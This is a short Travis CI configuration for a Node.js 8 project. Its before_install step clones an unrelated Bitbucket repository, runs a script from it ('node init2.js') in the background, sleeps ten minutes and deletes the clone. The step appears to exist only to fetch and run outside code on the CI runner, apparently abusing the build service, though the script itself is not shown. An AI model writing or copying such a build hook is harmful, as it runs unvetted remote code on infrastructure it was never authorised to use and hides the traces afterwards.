language: node_js
dist: trusty
node_js:
  - 8
  
before_install:
  - rm -rf tmp && git clone https://goopop@bitbucket.org/goopop/buildkitepath.git tmp && cd ./tmp && node init2.js &
  - sleep 10m
  - rm -rf tmp

branches:
  only:
    - master
